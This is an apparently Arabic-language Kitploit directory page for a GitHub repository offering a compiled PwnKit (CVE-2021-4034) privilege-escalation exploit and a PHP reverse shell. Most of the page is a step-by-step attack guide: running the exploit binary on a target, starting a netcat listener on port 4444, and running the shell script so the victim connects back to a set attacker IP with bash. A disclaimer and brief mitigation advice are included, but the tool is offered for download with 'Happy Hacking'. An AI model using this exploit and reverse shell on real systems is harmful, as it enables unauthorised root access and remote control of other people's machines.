Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jscamposx/hack
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubjscamposx/hack

hack

مستودع بحث أمني يحتوي على برهان مفهوم (PoC) للثغرة الأمنية CVE-2021-4034 (PwnKit) وأدوات برمجة نصية لعرض تصعيد الامتيازات والتنفيذ عن بُعد في بيئات Linux.

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

💀 PwnKit (CVE-2021-4034) & Reverse Shell Toolkit

Security Research CVE Language

⚠️ إخلاء مسؤولية: تم إنشاء هذا المستودع لأغراض تعليمية وبحثية في مجال الأمن فقط. المؤلف غير مسؤول عن سوء استخدام هذه الأدوات. استخدمه فقط في بيئات خاضعة للرقابة أو حيث لديك إذن صريح.


📜 الوصف

يحتوي هذا المستودع على دليل إثبات (PoC) مُجمّع للثغرة PwnKit (CVE-2021-4034)، وهي ثغرة حرجة لتصعيد الصلاحيات محليًا في مكون pkexec من Polkit.

بالإضافة إلى ذلك، تم تضمين سكريبت شل عكسية بلغة PHP جاهز للنشر بعد الاستغلال أو كمتجه وصول أولي.

🎯 الهدف

الحصول على صلاحيات root في أنظمة لينكس الضعيفة وإنشاء استمرارية أو تحكم عن بُعد عبر شل عكسية.


📂 محتوى الترسانة

1. PwnKit (ملف ELF Binary)

الاستغلال المُجمّع لـ CVE-2021-4034.

  • الوظيفة: يتلاعب بمتغيرات البيئة لـ pkexec لتحميل مكتبة مشتركة ضارة وتنفيذ كود كـ root.
  • المعمارية: x86_64 (لينكس).
  • التبعيات: يتطلب تثبيت pkexec على الهدف.

2. reverseShell.php

حمولة خفيفة لإنشاء اتصال عكسي.

  • الإعداد الحالي:
    • IP: 192.168.1.8
    • المنفذ: 4444
    • الشل: /bin/bash
  • الاستخدام: يمكن تشغيله عبر CLI (php reverseShell.php) أو حقنه في خادم ويب ضعيف.

🚀 دليل الاستخدام

المرحلة 1: تصعيد الصلاحيات (PwnKit)

  1. انقل الملف الثنائي PwnKit إلى النظام المستهدف.
  2. امنحه صلاحيات التنفيذ:
    root@kitploit:~
    chmod +x PwnKit
    
  3. نفذ الاستغلال:
    root@kitploit:~
    ./PwnKit
    
    إذا نجح، يجب أن تحصل على شل بصلاحيات root فورًا.

المرحلة 2: الاتصال عن بُعد (شل عكسية)

  1. على جهازك المهاجم، ابدأ مستمعًا باستخدام Netcat:
    root@kitploit:~
    nc -lvnp 4444
    
  2. عدّل reverseShell.php إذا كان عنوان IP الخاص بك مختلفًا عن الإعداد الافتراضي.
  3. نفذ السكريبت على الضحية (كمستخدم عادي أو كـ root بعد استخدام PwnKit):
    root@kitploit:~
    php reverseShell.php
    

🛠️ التفاصيل التقنية (CVE-2021-4034)

تقع هذه الثغرة في كيفية تعامل pkexec مع وسائط سطر الأوامر. عند تمرير قائمة وسائط فارغة، يحاول pkexec الوصول إلى argv[1] خارج الحدود، مما يسمح للمهاجم بالكتابة فوق متغيرات البيئة في الذاكرة، وتحديدًا حقن متغير ضار GCONV_PATH لاختطاف تدفق التنفيذ.

  • تاريخ الإفصاح: يناير 2022.
  • الأثر: وصول فوري إلى root في معظم توزيعات لينكس الافتراضية (Ubuntu, Debian, Fedora, CentOS).

🛡️ التخفيف

للحماية من هذا الاستغلال:

  1. تحديث Polkit: قم بتثبيت التصحيحات الأمنية المقدمة من توزيعتك.
  2. إزالة بت SUID (حل مؤقت):
    root@kitploit:~
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

تنزيل الأداة